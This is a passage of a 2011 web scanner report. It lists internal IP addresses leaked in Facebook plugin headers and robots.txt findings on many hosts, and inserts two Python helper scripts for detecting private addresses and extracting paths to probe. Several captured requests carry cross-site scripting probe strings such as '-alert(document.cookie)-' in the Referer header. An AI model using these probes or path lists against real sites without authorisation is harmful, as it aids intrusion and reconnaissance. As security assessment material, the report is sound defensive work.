Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.8.112
X-Cnection: close
Date: Mon, 16 May 2011 10:23:41 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.80. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.166.120
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.81. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.188.121
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.82. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.91.71
X-Cnection: close
Date: Mon, 16 May 2011 10:32:57 GMT
Content-Length: 8692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.83. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.168.122

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.168.122
X-Cnection: close
Date: Mon, 16 May 2011 10:41:52 GMT
Content-Length: 6484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.84. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.33.21.111

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.21.111
X-Cnection: close
Date: Mon, 16 May 2011 10:23:41 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.85. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.167.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.167.112
X-Cnection: close
Date: Mon, 16 May 2011 10:41:52 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.86. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.42.216.35

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.216.35
X-Cnection: close
Date: Mon, 16 May 2011 01:53:50 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.87. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.170.128

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.170.128
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.88. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.55.10.49

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.49
X-Cnection: close
Date: Mon, 16 May 2011 02:03:31 GMT
Content-Length: 9053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.89. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.54.86.49

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Mon, 16 May 2011 01:59:12 GMT
Content-Length: 9048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
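Every finding in this group is the same pattern: a 10.x.x.x address in a custom response header (X-FB-Server), a backend hostname-to-IP mapping that a scanner flags as internal-topology leakage. The check below is an added example written for this report, not part of the original scan output: it walks the headers and body of a raw HTTP response and returns each RFC 1918 address with the header it was found in. The sample response is constructed from the trimmed headers of finding 21.82 above; everything else (function names, the regex) is this example's own. Only the three RFC 1918 blocks are matched, deliberately, so loopback, link-local and CGNAT ranges are not reported as RFC 1918 hits.

```python
import ipaddress
import re

# Constructed sample: the response headers of finding 21.82 above, body trimmed.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.91.71
X-Cnection: close
Date: Mon, 16 May 2011 10:32:57 GMT
Content-Length: 8692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
"""

# The three RFC 1918 blocks, and nothing else (127/8, 169.254/16, 100.64/10 are
# private-ish but are not RFC 1918, so they are intentionally not listed).
PRIVATE_NETS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Dotted quad not embedded in a longer dotted/numeric run (avoids matching
# version strings such as "1.1.2.3.4" or parts of a longer number).
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def is_rfc1918(addr: str) -> bool:
    """True if addr parses as IPv4 and falls in 10/8, 172.16/12 or 192.168/16."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:  # e.g. "999.1.1.1" matches the regex but is not an address
        return False
    return ip.version == 4 and any(ip in net for net in PRIVATE_NETS)


def find_private_ips(raw_response: str):
    """Scan one raw HTTP response for RFC 1918 addresses.

    Returns a list of (location, address) pairs in order of appearance, where
    location is the header name for header hits and 'body' for body hits.
    """
    text = raw_response.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")  # headers end at the first blank line
    hits = []
    for line in head.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if not sep:
            continue
        for candidate in IPV4_RE.findall(value):
            if is_rfc1918(candidate):
                hits.append((name.strip(), candidate))
    for candidate in IPV4_RE.findall(body):
        if is_rfc1918(candidate):
            hits.append(("body", candidate))
    return hits


if __name__ == "__main__":
    for location, address in find_private_ips(SAMPLE_RESPONSE):
        print(f"RFC 1918 address {address} disclosed in {location}")
```

Run it over a directory of saved responses to triage a scan like this one in bulk; a hit in a header such as X-FB-Server or Via is an infrastructure identifier, a hit in the body is worth a closer look because it may sit inside an error page or a debug comment.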

22. Robots.txt file
There are 117 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
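The practical use of these findings is the one the background describes: turn each Disallow entry into a path to test for real access control. The parser below is an added example written for this report, not part of the original scan output. It handles the record structure the files above show (several User-agent lines sharing one rule block, comment lines, empty Disallow values, Sitemap lines outside any group) and returns only the entries worth probing, dropping the blanket "Disallow: /" and the empty "Disallow:" because neither names a specific area. The sample file is constructed from fragments of the ace.imageg.net and community.petco.com entries below, with a placeholder sitemap host; the function names are this example's own.

```python
from collections import defaultdict

# Constructed sample modelled on the ace.imageg.net and community.petco.com
# files in this section; the sitemap host is a placeholder, not a real site.
SAMPLE_ROBOTS = """# Exclude robots from these
User-agent: *
Disallow: /coreg/
Disallow: /cart/
Disallow: /checkout/
Disallow: /cartHandler/
Sitemap: http://example.invalid/SiteMap.aspx?webtag=fd03pz

User-Agent: AdsBot-Google
Disallow:
"""


def parse_robots(text):
    """Parse robots.txt text into ({agent: [(directive, value), ...]}, [sitemaps]).

    Field names and agent names are lower-cased. Consecutive User-agent lines
    share the rule block that follows them; a User-agent line that appears after
    rules starts a new block. Sitemap lines are global and collected separately.
    """
    groups = defaultdict(list)
    sitemaps = []
    current = []        # agents the following rules apply to
    seen_rule = False   # whether the current block already holds a rule
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if not line:
            continue
        field, sep, value = line.partition(":")
        if not sep:
            continue  # not a "field: value" line; ignore
        field = field.strip().lower()
        value = value.strip()
        if field == "sitemap":
            sitemaps.append(value)
        elif field == "user-agent":
            if seen_rule:          # rules already seen: this starts a new block
                current = []
                seen_rule = False
            current.append(value.lower())
        elif field in ("disallow", "allow", "noindex"):
            seen_rule = True
            for agent in current:
                groups[agent].append((field, value))
    return dict(groups), sitemaps


def candidate_paths(text, agent="*"):
    """Paths a tester should request directly to confirm access control.

    Returns Disallow/Noindex values for `agent` in file order, without
    duplicates. A blanket "Disallow: /" and an empty "Disallow:" (allow all)
    name no specific area, so they contribute nothing.
    """
    groups, _ = parse_robots(text)
    paths = []
    for directive, value in groups.get(agent.lower(), []):
        if directive in ("disallow", "noindex") and value not in ("", "/"):
            if value not in paths:
                paths.append(value)
    return paths


if __name__ == "__main__":
    groups, sitemaps = parse_robots(SAMPLE_ROBOTS)
    print("sitemaps:", sitemaps)
    for path in candidate_paths(SAMPLE_ROBOTS):
        print("probe:", path)
```

Feed the returned paths to an authenticated and an unauthenticated request and compare the responses; a 200 to the anonymous request on a path such as /checkout/ or /CompanyJobs/PreviewApplication.aspx is the finding, the robots.txt entry on its own is only the pointer. Sitemap entries deserve the same treatment, since they enumerate content the site wants indexed and often include paths not linked from the front page.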


22.1. http://4qinvite.4q.iperceptions.com/1.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
Date: Mon, 16 May 2011 02:08:07 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.2. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.monetate.net
Path:   /trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.monetate.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 01:53:12 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Thu, 12 Aug 2010 15:52:45 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

22.3. http://a.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 28 Feb 2011 12:34:42 GMT
ETag: "666ed-1a-49d56e768dc80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.4. http://a.rfihub.com/ca.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 26

User-agent: *
Disallow: /

22.5. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

22.6. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ace.imageg.net
Path:   /graphics/product_images/pACE3-4403835th.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 22 Apr 2011 08:47:00 GMT
ETag: "4e4490-1cd-4a17de6ae2900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 461
Connection: close

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

22.7. http://action.media6degrees.com/orbserv/hbjs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 16 May 2011 01:55:03 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.8. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:33 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


22.9. http://ad.doubleclick.net/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.10. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.traderonline.com
Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.traderonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:18 GMT
ETag: "c6ad8-1a-46e5f933c6580"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660;path=/;httponly

User-agent: *
Disallow: /

22.11. http://ads.undertone.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /f

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "55001c-1a-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

